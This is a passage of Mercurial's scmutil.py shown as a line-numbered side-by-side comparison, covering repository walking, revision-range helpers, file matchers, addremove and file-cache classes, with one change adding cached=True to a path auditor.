369 yield root # found a repository
369 yield root # found a repository
370 qroot = os.path.join(root, '.hg', 'patches')
370 qroot = os.path.join(root, '.hg', 'patches')
371 if os.path.isdir(os.path.join(qroot, '.hg')):
371 if os.path.isdir(os.path.join(qroot, '.hg')):
372 yield qroot # we have a patch queue repo here
372 yield qroot # we have a patch queue repo here
373 if recurse:
373 if recurse:
374 # avoid recursing inside the .hg directory
374 # avoid recursing inside the .hg directory
375 dirs.remove('.hg')
375 dirs.remove('.hg')
376 else:
376 else:
377 dirs[:] = [] # don't descend further
377 dirs[:] = [] # don't descend further
378 elif followsym:
378 elif followsym:
379 newdirs = []
379 newdirs = []
380 for d in dirs:
380 for d in dirs:
381 fname = os.path.join(root, d)
381 fname = os.path.join(root, d)
382 if adddir(seen_dirs, fname):
382 if adddir(seen_dirs, fname):
383 if os.path.islink(fname):
383 if os.path.islink(fname):
384 for hgname in walkrepos(fname, True, seen_dirs):
384 for hgname in walkrepos(fname, True, seen_dirs):
385 yield hgname
385 yield hgname
386 else:
386 else:
387 newdirs.append(d)
387 newdirs.append(d)
388 dirs[:] = newdirs
388 dirs[:] = newdirs
389
389
390 def binnode(ctx):
390 def binnode(ctx):
391 """Return binary node id for a given basectx"""
391 """Return binary node id for a given basectx"""
392 node = ctx.node()
392 node = ctx.node()
393 if node is None:
393 if node is None:
394 return wdirid
394 return wdirid
395 return node
395 return node
396
396
397 def intrev(ctx):
397 def intrev(ctx):
398 """Return integer for a given basectx that can be used in comparison or
398 """Return integer for a given basectx that can be used in comparison or
399 arithmetic operation"""
399 arithmetic operation"""
400 rev = ctx.rev()
400 rev = ctx.rev()
401 if rev is None:
401 if rev is None:
402 return wdirrev
402 return wdirrev
403 return rev
403 return rev
404
404
405 def revsingle(repo, revspec, default='.'):
405 def revsingle(repo, revspec, default='.'):
406 if not revspec and revspec != 0:
406 if not revspec and revspec != 0:
407 return repo[default]
407 return repo[default]
408
408
409 l = revrange(repo, [revspec])
409 l = revrange(repo, [revspec])
410 if not l:
410 if not l:
411 raise error.Abort(_('empty revision set'))
411 raise error.Abort(_('empty revision set'))
412 return repo[l.last()]
412 return repo[l.last()]
413
413
414 def _pairspec(revspec):
414 def _pairspec(revspec):
415 tree = revsetlang.parse(revspec)
415 tree = revsetlang.parse(revspec)
416 return tree and tree[0] in ('range', 'rangepre', 'rangepost', 'rangeall')
416 return tree and tree[0] in ('range', 'rangepre', 'rangepost', 'rangeall')
417
417
418 def revpair(repo, revs):
418 def revpair(repo, revs):
419 if not revs:
419 if not revs:
420 return repo.dirstate.p1(), None
420 return repo.dirstate.p1(), None
421
421
422 l = revrange(repo, revs)
422 l = revrange(repo, revs)
423
423
424 if not l:
424 if not l:
425 first = second = None
425 first = second = None
426 elif l.isascending():
426 elif l.isascending():
427 first = l.min()
427 first = l.min()
428 second = l.max()
428 second = l.max()
429 elif l.isdescending():
429 elif l.isdescending():
430 first = l.max()
430 first = l.max()
431 second = l.min()
431 second = l.min()
432 else:
432 else:
433 first = l.first()
433 first = l.first()
434 second = l.last()
434 second = l.last()
435
435
436 if first is None:
436 if first is None:
437 raise error.Abort(_('empty revision range'))
437 raise error.Abort(_('empty revision range'))
438 if (first == second and len(revs) >= 2
438 if (first == second and len(revs) >= 2
439 and not all(revrange(repo, [r]) for r in revs)):
439 and not all(revrange(repo, [r]) for r in revs)):
440 raise error.Abort(_('empty revision on one side of range'))
440 raise error.Abort(_('empty revision on one side of range'))
441
441
442 # if top-level is range expression, the result must always be a pair
442 # if top-level is range expression, the result must always be a pair
443 if first == second and len(revs) == 1 and not _pairspec(revs[0]):
443 if first == second and len(revs) == 1 and not _pairspec(revs[0]):
444 return repo.lookup(first), None
444 return repo.lookup(first), None
445
445
446 return repo.lookup(first), repo.lookup(second)
446 return repo.lookup(first), repo.lookup(second)
447
447
448 def revrange(repo, specs):
448 def revrange(repo, specs):
449 """Execute 1 to many revsets and return the union.
449 """Execute 1 to many revsets and return the union.
450
450
451 This is the preferred mechanism for executing revsets using user-specified
451 This is the preferred mechanism for executing revsets using user-specified
452 config options, such as revset aliases.
452 config options, such as revset aliases.
453
453
454 The revsets specified by ``specs`` will be executed via a chained ``OR``
454 The revsets specified by ``specs`` will be executed via a chained ``OR``
455 expression. If ``specs`` is empty, an empty result is returned.
455 expression. If ``specs`` is empty, an empty result is returned.
456
456
457 ``specs`` can contain integers, in which case they are assumed to be
457 ``specs`` can contain integers, in which case they are assumed to be
458 revision numbers.
458 revision numbers.
459
459
460 It is assumed the revsets are already formatted. If you have arguments
460 It is assumed the revsets are already formatted. If you have arguments
461 that need to be expanded in the revset, call ``revsetlang.formatspec()``
461 that need to be expanded in the revset, call ``revsetlang.formatspec()``
462 and pass the result as an element of ``specs``.
462 and pass the result as an element of ``specs``.
463
463
464 Specifying a single revset is allowed.
464 Specifying a single revset is allowed.
465
465
466 Returns a ``revset.abstractsmartset`` which is a list-like interface over
466 Returns a ``revset.abstractsmartset`` which is a list-like interface over
467 integer revisions.
467 integer revisions.
468 """
468 """
469 allspecs = []
469 allspecs = []
470 for spec in specs:
470 for spec in specs:
471 if isinstance(spec, int):
471 if isinstance(spec, int):
472 spec = revsetlang.formatspec('rev(%d)', spec)
472 spec = revsetlang.formatspec('rev(%d)', spec)
473 allspecs.append(spec)
473 allspecs.append(spec)
474 return repo.anyrevs(allspecs, user=True)
474 return repo.anyrevs(allspecs, user=True)
475
475
476 def meaningfulparents(repo, ctx):
476 def meaningfulparents(repo, ctx):
477 """Return list of meaningful (or all if debug) parentrevs for rev.
477 """Return list of meaningful (or all if debug) parentrevs for rev.
478
478
479 For merges (two non-nullrev revisions) both parents are meaningful.
479 For merges (two non-nullrev revisions) both parents are meaningful.
480 Otherwise the first parent revision is considered meaningful if it
480 Otherwise the first parent revision is considered meaningful if it
481 is not the preceding revision.
481 is not the preceding revision.
482 """
482 """
483 parents = ctx.parents()
483 parents = ctx.parents()
484 if len(parents) > 1:
484 if len(parents) > 1:
485 return parents
485 return parents
486 if repo.ui.debugflag:
486 if repo.ui.debugflag:
487 return [parents[0], repo['null']]
487 return [parents[0], repo['null']]
488 if parents[0].rev() >= intrev(ctx) - 1:
488 if parents[0].rev() >= intrev(ctx) - 1:
489 return []
489 return []
490 return parents
490 return parents
491
491
492 def expandpats(pats):
492 def expandpats(pats):
493 '''Expand bare globs when running on windows.
493 '''Expand bare globs when running on windows.
494 On posix we assume it already has already been done by sh.'''
494 On posix we assume it already has already been done by sh.'''
495 if not util.expandglobs:
495 if not util.expandglobs:
496 return list(pats)
496 return list(pats)
497 ret = []
497 ret = []
498 for kindpat in pats:
498 for kindpat in pats:
499 kind, pat = matchmod._patsplit(kindpat, None)
499 kind, pat = matchmod._patsplit(kindpat, None)
500 if kind is None:
500 if kind is None:
501 try:
501 try:
502 globbed = glob.glob(pat)
502 globbed = glob.glob(pat)
503 except re.error:
503 except re.error:
504 globbed = [pat]
504 globbed = [pat]
505 if globbed:
505 if globbed:
506 ret.extend(globbed)
506 ret.extend(globbed)
507 continue
507 continue
508 ret.append(kindpat)
508 ret.append(kindpat)
509 return ret
509 return ret
510
510
511 def matchandpats(ctx, pats=(), opts=None, globbed=False, default='relpath',
511 def matchandpats(ctx, pats=(), opts=None, globbed=False, default='relpath',
512 badfn=None):
512 badfn=None):
513 '''Return a matcher and the patterns that were used.
513 '''Return a matcher and the patterns that were used.
514 The matcher will warn about bad matches, unless an alternate badfn callback
514 The matcher will warn about bad matches, unless an alternate badfn callback
515 is provided.'''
515 is provided.'''
516 if pats == ("",):
516 if pats == ("",):
517 pats = []
517 pats = []
518 if opts is None:
518 if opts is None:
519 opts = {}
519 opts = {}
520 if not globbed and default == 'relpath':
520 if not globbed and default == 'relpath':
521 pats = expandpats(pats or [])
521 pats = expandpats(pats or [])
522
522
523 def bad(f, msg):
523 def bad(f, msg):
524 ctx.repo().ui.warn("%s: %s\n" % (m.rel(f), msg))
524 ctx.repo().ui.warn("%s: %s\n" % (m.rel(f), msg))
525
525
526 if badfn is None:
526 if badfn is None:
527 badfn = bad
527 badfn = bad
528
528
529 m = ctx.match(pats, opts.get('include'), opts.get('exclude'),
529 m = ctx.match(pats, opts.get('include'), opts.get('exclude'),
530 default, listsubrepos=opts.get('subrepos'), badfn=badfn)
530 default, listsubrepos=opts.get('subrepos'), badfn=badfn)
531
531
532 if m.always():
532 if m.always():
533 pats = []
533 pats = []
534 return m, pats
534 return m, pats
535
535
536 def match(ctx, pats=(), opts=None, globbed=False, default='relpath',
536 def match(ctx, pats=(), opts=None, globbed=False, default='relpath',
537 badfn=None):
537 badfn=None):
538 '''Return a matcher that will warn about bad matches.'''
538 '''Return a matcher that will warn about bad matches.'''
539 return matchandpats(ctx, pats, opts, globbed, default, badfn=badfn)[0]
539 return matchandpats(ctx, pats, opts, globbed, default, badfn=badfn)[0]
540
540
541 def matchall(repo):
541 def matchall(repo):
542 '''Return a matcher that will efficiently match everything.'''
542 '''Return a matcher that will efficiently match everything.'''
543 return matchmod.always(repo.root, repo.getcwd())
543 return matchmod.always(repo.root, repo.getcwd())
544
544
545 def matchfiles(repo, files, badfn=None):
545 def matchfiles(repo, files, badfn=None):
546 '''Return a matcher that will efficiently match exactly these files.'''
546 '''Return a matcher that will efficiently match exactly these files.'''
547 return matchmod.exact(repo.root, repo.getcwd(), files, badfn=badfn)
547 return matchmod.exact(repo.root, repo.getcwd(), files, badfn=badfn)
548
548
549 def origpath(ui, repo, filepath):
549 def origpath(ui, repo, filepath):
550 '''customize where .orig files are created
550 '''customize where .orig files are created
551
551
552 Fetch user defined path from config file: [ui] origbackuppath = <path>
552 Fetch user defined path from config file: [ui] origbackuppath = <path>
553 Fall back to default (filepath) if not specified
553 Fall back to default (filepath) if not specified
554 '''
554 '''
555 origbackuppath = ui.config('ui', 'origbackuppath')
555 origbackuppath = ui.config('ui', 'origbackuppath')
556 if origbackuppath is None:
556 if origbackuppath is None:
557 return filepath + ".orig"
557 return filepath + ".orig"
558
558
559 filepathfromroot = os.path.relpath(filepath, start=repo.root)
559 filepathfromroot = os.path.relpath(filepath, start=repo.root)
560 fullorigpath = repo.wjoin(origbackuppath, filepathfromroot)
560 fullorigpath = repo.wjoin(origbackuppath, filepathfromroot)
561
561
562 origbackupdir = repo.vfs.dirname(fullorigpath)
562 origbackupdir = repo.vfs.dirname(fullorigpath)
563 if not repo.vfs.exists(origbackupdir):
563 if not repo.vfs.exists(origbackupdir):
564 ui.note(_('creating directory: %s\n') % origbackupdir)
564 ui.note(_('creating directory: %s\n') % origbackupdir)
565 util.makedirs(origbackupdir)
565 util.makedirs(origbackupdir)
566
566
567 return fullorigpath + ".orig"
567 return fullorigpath + ".orig"
568
568
569 class _containsnode(object):
569 class _containsnode(object):
570 """proxy __contains__(node) to container.__contains__ which accepts revs"""
570 """proxy __contains__(node) to container.__contains__ which accepts revs"""
571
571
572 def __init__(self, repo, revcontainer):
572 def __init__(self, repo, revcontainer):
573 self._torev = repo.changelog.rev
573 self._torev = repo.changelog.rev
574 self._revcontains = revcontainer.__contains__
574 self._revcontains = revcontainer.__contains__
575
575
576 def __contains__(self, node):
576 def __contains__(self, node):
577 return self._revcontains(self._torev(node))
577 return self._revcontains(self._torev(node))
578
578
579 def cleanupnodes(repo, mapping, operation):
579 def cleanupnodes(repo, mapping, operation):
580 """do common cleanups when old nodes are replaced by new nodes
580 """do common cleanups when old nodes are replaced by new nodes
581
581
582 That includes writing obsmarkers or stripping nodes, and moving bookmarks.
582 That includes writing obsmarkers or stripping nodes, and moving bookmarks.
583 (we might also want to move working directory parent in the future)
583 (we might also want to move working directory parent in the future)
584
584
585 mapping is {oldnode: [newnode]} or a iterable of nodes if they do not have
585 mapping is {oldnode: [newnode]} or a iterable of nodes if they do not have
586 replacements. operation is a string, like "rebase".
586 replacements. operation is a string, like "rebase".
587 """
587 """
588 if not util.safehasattr(mapping, 'items'):
588 if not util.safehasattr(mapping, 'items'):
589 mapping = {n: () for n in mapping}
589 mapping = {n: () for n in mapping}
590
590
591 with repo.transaction('cleanup') as tr:
591 with repo.transaction('cleanup') as tr:
592 # Move bookmarks
592 # Move bookmarks
593 bmarks = repo._bookmarks
593 bmarks = repo._bookmarks
594 bmarkchanges = []
594 bmarkchanges = []
595 allnewnodes = [n for ns in mapping.values() for n in ns]
595 allnewnodes = [n for ns in mapping.values() for n in ns]
596 for oldnode, newnodes in mapping.items():
596 for oldnode, newnodes in mapping.items():
597 oldbmarks = repo.nodebookmarks(oldnode)
597 oldbmarks = repo.nodebookmarks(oldnode)
598 if not oldbmarks:
598 if not oldbmarks:
599 continue
599 continue
600 from . import bookmarks # avoid import cycle
600 from . import bookmarks # avoid import cycle
601 if len(newnodes) > 1:
601 if len(newnodes) > 1:
602 # usually a split, take the one with biggest rev number
602 # usually a split, take the one with biggest rev number
603 newnode = next(repo.set('max(%ln)', newnodes)).node()
603 newnode = next(repo.set('max(%ln)', newnodes)).node()
604 elif len(newnodes) == 0:
604 elif len(newnodes) == 0:
605 # move bookmark backwards
605 # move bookmark backwards
606 roots = list(repo.set('max((::%n) - %ln)', oldnode,
606 roots = list(repo.set('max((::%n) - %ln)', oldnode,
607 list(mapping)))
607 list(mapping)))
608 if roots:
608 if roots:
609 newnode = roots[0].node()
609 newnode = roots[0].node()
610 else:
610 else:
611 newnode = nullid
611 newnode = nullid
612 else:
612 else:
613 newnode = newnodes[0]
613 newnode = newnodes[0]
614 repo.ui.debug('moving bookmarks %r from %s to %s\n' %
614 repo.ui.debug('moving bookmarks %r from %s to %s\n' %
615 (oldbmarks, hex(oldnode), hex(newnode)))
615 (oldbmarks, hex(oldnode), hex(newnode)))
616 # Delete divergent bookmarks being parents of related newnodes
616 # Delete divergent bookmarks being parents of related newnodes
617 deleterevs = repo.revs('parents(roots(%ln & (::%n))) - parents(%n)',
617 deleterevs = repo.revs('parents(roots(%ln & (::%n))) - parents(%n)',
618 allnewnodes, newnode, oldnode)
618 allnewnodes, newnode, oldnode)
619 deletenodes = _containsnode(repo, deleterevs)
619 deletenodes = _containsnode(repo, deleterevs)
620 for name in oldbmarks:
620 for name in oldbmarks:
621 bmarkchanges.append((name, newnode))
621 bmarkchanges.append((name, newnode))
622 for b in bookmarks.divergent2delete(repo, deletenodes, name):
622 for b in bookmarks.divergent2delete(repo, deletenodes, name):
623 bmarkchanges.append((b, None))
623 bmarkchanges.append((b, None))
624
624
625 if bmarkchanges:
625 if bmarkchanges:
626 bmarks.applychanges(repo, tr, bmarkchanges)
626 bmarks.applychanges(repo, tr, bmarkchanges)
627
627
628 # Obsolete or strip nodes
628 # Obsolete or strip nodes
629 if obsolete.isenabled(repo, obsolete.createmarkersopt):
629 if obsolete.isenabled(repo, obsolete.createmarkersopt):
630 # If a node is already obsoleted, and we want to obsolete it
630 # If a node is already obsoleted, and we want to obsolete it
631 # without a successor, skip that obssolete request since it's
631 # without a successor, skip that obssolete request since it's
632 # unnecessary. That's the "if s or not isobs(n)" check below.
632 # unnecessary. That's the "if s or not isobs(n)" check below.
633 # Also sort the node in topology order, that might be useful for
633 # Also sort the node in topology order, that might be useful for
634 # some obsstore logic.
634 # some obsstore logic.
635 # NOTE: the filtering and sorting might belong to createmarkers.
635 # NOTE: the filtering and sorting might belong to createmarkers.
636 # Unfiltered repo is needed since nodes in mapping might be hidden.
636 # Unfiltered repo is needed since nodes in mapping might be hidden.
637 unfi = repo.unfiltered()
637 unfi = repo.unfiltered()
638 isobs = unfi.obsstore.successors.__contains__
638 isobs = unfi.obsstore.successors.__contains__
639 torev = unfi.changelog.rev
639 torev = unfi.changelog.rev
640 sortfunc = lambda ns: torev(ns[0])
640 sortfunc = lambda ns: torev(ns[0])
641 rels = [(unfi[n], tuple(unfi[m] for m in s))
641 rels = [(unfi[n], tuple(unfi[m] for m in s))
642 for n, s in sorted(mapping.items(), key=sortfunc)
642 for n, s in sorted(mapping.items(), key=sortfunc)
643 if s or not isobs(n)]
643 if s or not isobs(n)]
644 obsolete.createmarkers(repo, rels, operation=operation)
644 obsolete.createmarkers(repo, rels, operation=operation)
645 else:
645 else:
646 from . import repair # avoid import cycle
646 from . import repair # avoid import cycle
647 repair.delayedstrip(repo.ui, repo, list(mapping), operation)
647 repair.delayedstrip(repo.ui, repo, list(mapping), operation)
648
648
649 def addremove(repo, matcher, prefix, opts=None, dry_run=None, similarity=None):
649 def addremove(repo, matcher, prefix, opts=None, dry_run=None, similarity=None):
650 if opts is None:
650 if opts is None:
651 opts = {}
651 opts = {}
652 m = matcher
652 m = matcher
653 if dry_run is None:
653 if dry_run is None:
654 dry_run = opts.get('dry_run')
654 dry_run = opts.get('dry_run')
655 if similarity is None:
655 if similarity is None:
656 similarity = float(opts.get('similarity') or 0)
656 similarity = float(opts.get('similarity') or 0)
657
657
658 ret = 0
658 ret = 0
659 join = lambda f: os.path.join(prefix, f)
659 join = lambda f: os.path.join(prefix, f)
660
660
661 wctx = repo[None]
661 wctx = repo[None]
662 for subpath in sorted(wctx.substate):
662 for subpath in sorted(wctx.substate):
663 submatch = matchmod.subdirmatcher(subpath, m)
663 submatch = matchmod.subdirmatcher(subpath, m)
664 if opts.get('subrepos') or m.exact(subpath) or any(submatch.files()):
664 if opts.get('subrepos') or m.exact(subpath) or any(submatch.files()):
665 sub = wctx.sub(subpath)
665 sub = wctx.sub(subpath)
666 try:
666 try:
667 if sub.addremove(submatch, prefix, opts, dry_run, similarity):
667 if sub.addremove(submatch, prefix, opts, dry_run, similarity):
668 ret = 1
668 ret = 1
669 except error.LookupError:
669 except error.LookupError:
670 repo.ui.status(_("skipping missing subrepository: %s\n")
670 repo.ui.status(_("skipping missing subrepository: %s\n")
671 % join(subpath))
671 % join(subpath))
672
672
673 rejected = []
673 rejected = []
674 def badfn(f, msg):
674 def badfn(f, msg):
675 if f in m.files():
675 if f in m.files():
676 m.bad(f, msg)
676 m.bad(f, msg)
677 rejected.append(f)
677 rejected.append(f)
678
678
679 badmatch = matchmod.badmatch(m, badfn)
679 badmatch = matchmod.badmatch(m, badfn)
680 added, unknown, deleted, removed, forgotten = _interestingfiles(repo,
680 added, unknown, deleted, removed, forgotten = _interestingfiles(repo,
681 badmatch)
681 badmatch)
682
682
683 unknownset = set(unknown + forgotten)
683 unknownset = set(unknown + forgotten)
684 toprint = unknownset.copy()
684 toprint = unknownset.copy()
685 toprint.update(deleted)
685 toprint.update(deleted)
686 for abs in sorted(toprint):
686 for abs in sorted(toprint):
687 if repo.ui.verbose or not m.exact(abs):
687 if repo.ui.verbose or not m.exact(abs):
688 if abs in unknownset:
688 if abs in unknownset:
689 status = _('adding %s\n') % m.uipath(abs)
689 status = _('adding %s\n') % m.uipath(abs)
690 else:
690 else:
691 status = _('removing %s\n') % m.uipath(abs)
691 status = _('removing %s\n') % m.uipath(abs)
692 repo.ui.status(status)
692 repo.ui.status(status)
693
693
694 renames = _findrenames(repo, m, added + unknown, removed + deleted,
694 renames = _findrenames(repo, m, added + unknown, removed + deleted,
695 similarity)
695 similarity)
696
696
697 if not dry_run:
697 if not dry_run:
698 _markchanges(repo, unknown + forgotten, deleted, renames)
698 _markchanges(repo, unknown + forgotten, deleted, renames)
699
699
700 for f in rejected:
700 for f in rejected:
701 if f in m.files():
701 if f in m.files():
702 return 1
702 return 1
703 return ret
703 return ret
704
704
705 def marktouched(repo, files, similarity=0.0):
705 def marktouched(repo, files, similarity=0.0):
706 '''Assert that files have somehow been operated upon. files are relative to
706 '''Assert that files have somehow been operated upon. files are relative to
707 the repo root.'''
707 the repo root.'''
708 m = matchfiles(repo, files, badfn=lambda x, y: rejected.append(x))
708 m = matchfiles(repo, files, badfn=lambda x, y: rejected.append(x))
709 rejected = []
709 rejected = []
710
710
711 added, unknown, deleted, removed, forgotten = _interestingfiles(repo, m)
711 added, unknown, deleted, removed, forgotten = _interestingfiles(repo, m)
712
712
713 if repo.ui.verbose:
713 if repo.ui.verbose:
714 unknownset = set(unknown + forgotten)
714 unknownset = set(unknown + forgotten)
715 toprint = unknownset.copy()
715 toprint = unknownset.copy()
716 toprint.update(deleted)
716 toprint.update(deleted)
717 for abs in sorted(toprint):
717 for abs in sorted(toprint):
718 if abs in unknownset:
718 if abs in unknownset:
719 status = _('adding %s\n') % abs
719 status = _('adding %s\n') % abs
720 else:
720 else:
721 status = _('removing %s\n') % abs
721 status = _('removing %s\n') % abs
722 repo.ui.status(status)
722 repo.ui.status(status)
723
723
724 renames = _findrenames(repo, m, added + unknown, removed + deleted,
724 renames = _findrenames(repo, m, added + unknown, removed + deleted,
725 similarity)
725 similarity)
726
726
727 _markchanges(repo, unknown + forgotten, deleted, renames)
727 _markchanges(repo, unknown + forgotten, deleted, renames)
728
728
729 for f in rejected:
729 for f in rejected:
730 if f in m.files():
730 if f in m.files():
731 return 1
731 return 1
732 return 0
732 return 0
733
733
734 def _interestingfiles(repo, matcher):
734 def _interestingfiles(repo, matcher):
735 '''Walk dirstate with matcher, looking for files that addremove would care
735 '''Walk dirstate with matcher, looking for files that addremove would care
736 about.
736 about.
737
737
738 This is different from dirstate.status because it doesn't care about
738 This is different from dirstate.status because it doesn't care about
739 whether files are modified or clean.'''
739 whether files are modified or clean.'''
740 added, unknown, deleted, removed, forgotten = [], [], [], [], []
740 added, unknown, deleted, removed, forgotten = [], [], [], [], []
741 audit_path = pathutil.pathauditor(repo.root)
741 audit_path = pathutil.pathauditor(repo.root, cached=True)
742
742
743 ctx = repo[None]
743 ctx = repo[None]
744 dirstate = repo.dirstate
744 dirstate = repo.dirstate
745 walkresults = dirstate.walk(matcher, sorted(ctx.substate), True, False,
745 walkresults = dirstate.walk(matcher, sorted(ctx.substate), True, False,
746 full=False)
746 full=False)
747 for abs, st in walkresults.iteritems():
747 for abs, st in walkresults.iteritems():
748 dstate = dirstate[abs]
748 dstate = dirstate[abs]
749 if dstate == '?' and audit_path.check(abs):
749 if dstate == '?' and audit_path.check(abs):
750 unknown.append(abs)
750 unknown.append(abs)
751 elif dstate != 'r' and not st:
751 elif dstate != 'r' and not st:
752 deleted.append(abs)
752 deleted.append(abs)
753 elif dstate == 'r' and st:
753 elif dstate == 'r' and st:
754 forgotten.append(abs)
754 forgotten.append(abs)
755 # for finding renames
755 # for finding renames
756 elif dstate == 'r' and not st:
756 elif dstate == 'r' and not st:
757 removed.append(abs)
757 removed.append(abs)
758 elif dstate == 'a':
758 elif dstate == 'a':
759 added.append(abs)
759 added.append(abs)
760
760
761 return added, unknown, deleted, removed, forgotten
761 return added, unknown, deleted, removed, forgotten
762
762
763 def _findrenames(repo, matcher, added, removed, similarity):
763 def _findrenames(repo, matcher, added, removed, similarity):
764 '''Find renames from removed files to added ones.'''
764 '''Find renames from removed files to added ones.'''
765 renames = {}
765 renames = {}
766 if similarity > 0:
766 if similarity > 0:
767 for old, new, score in similar.findrenames(repo, added, removed,
767 for old, new, score in similar.findrenames(repo, added, removed,
768 similarity):
768 similarity):
769 if (repo.ui.verbose or not matcher.exact(old)
769 if (repo.ui.verbose or not matcher.exact(old)
770 or not matcher.exact(new)):
770 or not matcher.exact(new)):
771 repo.ui.status(_('recording removal of %s as rename to %s '
771 repo.ui.status(_('recording removal of %s as rename to %s '
772 '(%d%% similar)\n') %
772 '(%d%% similar)\n') %
773 (matcher.rel(old), matcher.rel(new),
773 (matcher.rel(old), matcher.rel(new),
774 score * 100))
774 score * 100))
775 renames[new] = old
775 renames[new] = old
776 return renames
776 return renames
777
777
778 def _markchanges(repo, unknown, deleted, renames):
778 def _markchanges(repo, unknown, deleted, renames):
779 '''Marks the files in unknown as added, the files in deleted as removed,
779 '''Marks the files in unknown as added, the files in deleted as removed,
780 and the files in renames as copied.'''
780 and the files in renames as copied.'''
781 wctx = repo[None]
781 wctx = repo[None]
782 with repo.wlock():
782 with repo.wlock():
783 wctx.forget(deleted)
783 wctx.forget(deleted)
784 wctx.add(unknown)
784 wctx.add(unknown)
785 for new, old in renames.iteritems():
785 for new, old in renames.iteritems():
786 wctx.copy(old, new)
786 wctx.copy(old, new)
787
787
788 def dirstatecopy(ui, repo, wctx, src, dst, dryrun=False, cwd=None):
788 def dirstatecopy(ui, repo, wctx, src, dst, dryrun=False, cwd=None):
789 """Update the dirstate to reflect the intent of copying src to dst. For
789 """Update the dirstate to reflect the intent of copying src to dst. For
790 different reasons it might not end with dst being marked as copied from src.
790 different reasons it might not end with dst being marked as copied from src.
791 """
791 """
792 origsrc = repo.dirstate.copied(src) or src
792 origsrc = repo.dirstate.copied(src) or src
793 if dst == origsrc: # copying back a copy?
793 if dst == origsrc: # copying back a copy?
794 if repo.dirstate[dst] not in 'mn' and not dryrun:
794 if repo.dirstate[dst] not in 'mn' and not dryrun:
795 repo.dirstate.normallookup(dst)
795 repo.dirstate.normallookup(dst)
796 else:
796 else:
797 if repo.dirstate[origsrc] == 'a' and origsrc == src:
797 if repo.dirstate[origsrc] == 'a' and origsrc == src:
798 if not ui.quiet:
798 if not ui.quiet:
799 ui.warn(_("%s has not been committed yet, so no copy "
799 ui.warn(_("%s has not been committed yet, so no copy "
800 "data will be stored for %s.\n")
800 "data will be stored for %s.\n")
801 % (repo.pathto(origsrc, cwd), repo.pathto(dst, cwd)))
801 % (repo.pathto(origsrc, cwd), repo.pathto(dst, cwd)))
802 if repo.dirstate[dst] in '?r' and not dryrun:
802 if repo.dirstate[dst] in '?r' and not dryrun:
803 wctx.add([dst])
803 wctx.add([dst])
804 elif not dryrun:
804 elif not dryrun:
805 wctx.copy(origsrc, dst)
805 wctx.copy(origsrc, dst)
806
806
807 def readrequires(opener, supported):
807 def readrequires(opener, supported):
808 '''Reads and parses .hg/requires and checks if all entries found
808 '''Reads and parses .hg/requires and checks if all entries found
809 are in the list of supported features.'''
809 are in the list of supported features.'''
810 requirements = set(opener.read("requires").splitlines())
810 requirements = set(opener.read("requires").splitlines())
811 missings = []
811 missings = []
812 for r in requirements:
812 for r in requirements:
813 if r not in supported:
813 if r not in supported:
814 if not r or not r[0].isalnum():
814 if not r or not r[0].isalnum():
815 raise error.RequirementError(_(".hg/requires file is corrupt"))
815 raise error.RequirementError(_(".hg/requires file is corrupt"))
816 missings.append(r)
816 missings.append(r)
817 missings.sort()
817 missings.sort()
818 if missings:
818 if missings:
819 raise error.RequirementError(
819 raise error.RequirementError(
820 _("repository requires features unknown to this Mercurial: %s")
820 _("repository requires features unknown to this Mercurial: %s")
821 % " ".join(missings),
821 % " ".join(missings),
822 hint=_("see https://mercurial-scm.org/wiki/MissingRequirement"
822 hint=_("see https://mercurial-scm.org/wiki/MissingRequirement"
823 " for more information"))
823 " for more information"))
824 return requirements
824 return requirements
825
825
826 def writerequires(opener, requirements):
826 def writerequires(opener, requirements):
827 with opener('requires', 'w') as fp:
827 with opener('requires', 'w') as fp:
828 for r in sorted(requirements):
828 for r in sorted(requirements):
829 fp.write("%s\n" % r)
829 fp.write("%s\n" % r)
830
830
831 class filecachesubentry(object):
831 class filecachesubentry(object):
832 def __init__(self, path, stat):
832 def __init__(self, path, stat):
833 self.path = path
833 self.path = path
834 self.cachestat = None
834 self.cachestat = None
835 self._cacheable = None
835 self._cacheable = None
836
836
837 if stat:
837 if stat:
838 self.cachestat = filecachesubentry.stat(self.path)
838 self.cachestat = filecachesubentry.stat(self.path)
839
839
840 if self.cachestat:
840 if self.cachestat:
841 self._cacheable = self.cachestat.cacheable()
841 self._cacheable = self.cachestat.cacheable()
842 else:
842 else:
843 # None means we don't know yet
843 # None means we don't know yet
844 self._cacheable = None
844 self._cacheable = None
845
845
846 def refresh(self):
846 def refresh(self):
847 if self.cacheable():
847 if self.cacheable():
848 self.cachestat = filecachesubentry.stat(self.path)
848 self.cachestat = filecachesubentry.stat(self.path)
849
849
850 def cacheable(self):
850 def cacheable(self):
851 if self._cacheable is not None:
851 if self._cacheable is not None:
852 return self._cacheable
852 return self._cacheable
853
853
854 # we don't know yet, assume it is for now
854 # we don't know yet, assume it is for now
855 return True
855 return True
856
856
857 def changed(self):
857 def changed(self):
858 # no point in going further if we can't cache it
858 # no point in going further if we can't cache it
859 if not self.cacheable():
859 if not self.cacheable():
860 return True
860 return True
861
861
862 newstat = filecachesubentry.stat(self.path)
862 newstat = filecachesubentry.stat(self.path)
863
863
864 # we may not know if it's cacheable yet, check again now
864 # we may not know if it's cacheable yet, check again now
865 if newstat and self._cacheable is None:
865 if newstat and self._cacheable is None:
866 self._cacheable = newstat.cacheable()
866 self._cacheable = newstat.cacheable()
867
867
868 # check again
868 # check again
869 if not self._cacheable:
869 if not self._cacheable:
870 return True
870 return True
871
871
872 if self.cachestat != newstat:
872 if self.cachestat != newstat:
873 self.cachestat = newstat
873 self.cachestat = newstat
874 return True
874 return True
875 else:
875 else:
876 return False
876 return False
877
877
878 @staticmethod
878 @staticmethod
879 def stat(path):
879 def stat(path):
880 try:
880 try:
881 return util.cachestat(path)
881 return util.cachestat(path)
882 except OSError as e:
882 except OSError as e:
883 if e.errno != errno.ENOENT:
883 if e.errno != errno.ENOENT:
884 raise
884 raise
885
885
886 class filecacheentry(object):
886 class filecacheentry(object):
887 def __init__(self, paths, stat=True):
887 def __init__(self, paths, stat=True):
888 self._entries = []
888 self._entries = []
889 for path in paths:
889 for path in paths:
890 self._entries.append(filecachesubentry(path, stat))
890 self._entries.append(filecachesubentry(path, stat))
891
891
892 def changed(self):
892 def changed(self):
893 '''true if any entry has changed'''
893 '''true if any entry has changed'''
894 for entry in self._entries:
894 for entry in self._entries:
895 if entry.changed():
895 if entry.changed():
896 return True
896 return True
897 return False
897 return False
898
898
899 def refresh(self):
899 def refresh(self):
900 for entry in self._entries:
900 for entry in self._entries:
901 entry.refresh()
901 entry.refresh()
902
902
903 class filecache(object):
903 class filecache(object):
904 '''A property like decorator that tracks files under .hg/ for updates.
